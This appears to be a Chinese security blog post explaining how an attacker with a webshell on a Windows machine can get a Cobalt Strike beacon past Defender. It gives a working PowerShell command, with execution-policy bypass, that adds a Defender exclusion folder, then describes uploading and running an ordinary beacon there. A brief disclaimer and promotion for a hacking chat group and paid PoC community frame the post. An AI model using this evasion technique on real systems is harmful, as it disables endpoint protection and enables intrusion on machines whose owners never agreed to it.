不会写免杀也能轻松过defender上线CS

Original admin Z2O安全攻防 2022-06-10

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

只供对已授权的目标使用测试，对未授权目标的测试作者不承担责任，均由使用本人自行承担。

文章正文

偶然看到了通过powershell操作defender来添加排除项

https://docs.microsoft.com/en-us/powershell/module/defender/?view=windowsserver2019-ps

所以就有了这个场景：

假设我们拿到目标机器的webshell，对方开着Windows defender，在不会写免杀的情况下，上线CS：

添加排除项：

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\justtest"

CS生成一个普通的exe马：

上传到justtest目录：

运行：

上线：

技术交流

交流群

关注公众号回复“加群”，添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

知识星球

团队建立了知识星球，不定时更新最新漏洞复现，手把手教你，同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。

往期文章：

点一下爱心再走吧！